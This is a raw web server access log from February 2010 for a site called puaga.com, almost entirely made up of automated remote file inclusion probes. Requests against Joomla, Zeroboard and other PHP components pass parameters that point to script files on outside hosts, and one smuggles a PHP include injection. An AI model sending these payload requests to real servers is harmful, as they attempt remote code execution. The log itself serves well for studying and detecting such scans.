216.17.109.216 - - [12/Feb/2010:10:12:08 -0800] "GET /admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:12:08 -0800] "GET /logs//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:13:09 -0800] "GET /logs/access_100103.log//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:13:12 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:13:12 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:13:12 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:13:15 -0800] "GET /logs/access_100103.log//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:13:39 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:16:05 -0800] "GET /logs/access_100107.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:16:05 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:16:05 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:16:48 -0800] "GET /logs/access_100208.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:17:04 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:36 -0800] "GET /logs/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:36 -0800] "GET /logs/access_100112.log/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:37 -0800] "GET /index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:38 -0800] "GET /logs/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:38 -0800] "GET /logs/access_100112.log/index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [12/Feb/2010:10:17:38 -0800] "GET /index.php?var=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:20:19 -0800] "GET /logs/access_100118.log//bbs//skin/zero_vote/ask_password.php?dir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:20:20 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:20:20 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:20:44 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:20:44 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:21:21 -0800] "GET /logs/access_100119.log//bbs//skin/zero_vote/ask_password.php?dir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:10:24:00 -0800] "GET /logs/index.php?var=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:10:24:00 -0800] "GET /logs/access_100112.log/index.php?var=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.250.250.162 - - [12/Feb/2010:10:24:00 -0800] "GET /index.php?var=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.142.53.17 - - [12/Feb/2010:10:26:17 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "puaga.com"
219.142.53.20 - - [12/Feb/2010:10:26:18 -0800] "GET /orange_g/forum/viewtopic.php?p=28737 HTTP/1.0" 404 5258 "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "puaga.com"
89.108.64.216 - - [12/Feb/2010:10:26:45 -0800] "GET /index.php?var=http://julie.pwo.ca/idxx.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:10:27:11 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:29:04 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:29:05 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:29:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:29:06 -0800] "GET /logs/access_100126.log//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.189 - - [12/Feb/2010:10:29:24 -0800] "GET /logs/access_100121.log//?_REQUEST=&_REQUEST[option]=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:32:30 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.195.37.187 - - [12/Feb/2010:10:34:24 -0800] "GET /survey/survey.php?s_id=1 HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
211.108.61.176 - - [12/Feb/2010:10:35:33 -0800] "GET /logs///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:10:35:33 -0800] "GET //skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:10:35:33 -0800] "GET /logs/access_100105.log%20%20///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [12/Feb/2010:10:35:51 -0800] "GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://talesblue.com/bbs/icon/member_1140777777.jpg? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
77.88.25.28 - - [12/Feb/2010:10:36:42 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.atesh.info"
118.217.216.132 - - [12/Feb/2010:10:38:14 -0800] "GET /logs/access_100202.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:38:14 -0800] "GET /////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:38:14 -0800] "GET /logs//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:10:38:22 -0800] "GET ///////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:38:35 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:10:38:35 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:10:39:05 -0800] "GET /logs/access_100117.log%20%20////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:39:16 -0800] "GET /logs/access_100201.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:10:39:18 -0800] "GET /logs////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:39:34 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:42:56 -0800] "GET /logs/access_100127.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:43:00 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:43:00 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
151.68.238.97 - - [12/Feb/2010:10:43:04 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:43:54 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:43:54 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:43:54 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:44:04 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:10:45:55 -0800] "GET /become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:10:45:55 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:10:45:55 -0800] "GET /logs/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [12/Feb/2010:10:45:55 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [12/Feb/2010:10:46:18 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
118.82.114.113 - - [12/Feb/2010:10:46:18 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
118.82.114.113 - - [12/Feb/2010:10:46:18 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
118.82.114.113 - - [12/Feb/2010:10:46:18 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:29 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:29 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:29 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:47 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:47 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:47:48 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:47:58 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:47:58 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:47:58 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.78.78 - - [12/Feb/2010:10:48:02 -0800] "GET /logs/access_100108.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:48:04 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:10:48:11 -0800] "GET /logs/access_100109.log///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [12/Feb/2010:10:48:18 -0800] "GET /logs/access_100115.log///skin/zero_vote/setup.php?dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:10:48:22 -0800] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.171.171.177 - - [12/Feb/2010:10:50:30 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:51:47 -0800] "GET /logs/access_100112.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:51:47 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:51:48 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:52:10 -0800] "GET /logs/access_100112.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:52:10 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:52:11 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:54:42 -0800] "GET /logs/access_100103.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET /logs/access_100117.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET /logs/access_100117.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:26 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:31 -0800] "GET /logs/access_100125.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:36 -0800] "GET /logs/access_100125.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:39 -0800] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:39 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:39 -0800] "GET /logs/access_100117.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [12/Feb/2010:10:55:58 -0800] "GET /logs/access_100125.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:56:07 -0800] "GET /////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:56:07 -0800] "GET /logs//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:56:07 -0800] "GET /logs/access_100202.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [12/Feb/2010:10:56:30 -0800] "GET /logs/access_100103.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:10:57:30 -0800] "GET /logs/access_100201.log%20%20//////////delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:59:15 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:59:15 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:59:15 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [12/Feb/2010:10:59:17 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:10:59:23 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:10:59:24 -0800] "GET /orange_g/forum/viewtopic.php?p=27022 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
213.239.230.130 - - [12/Feb/2010:10:59:37 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
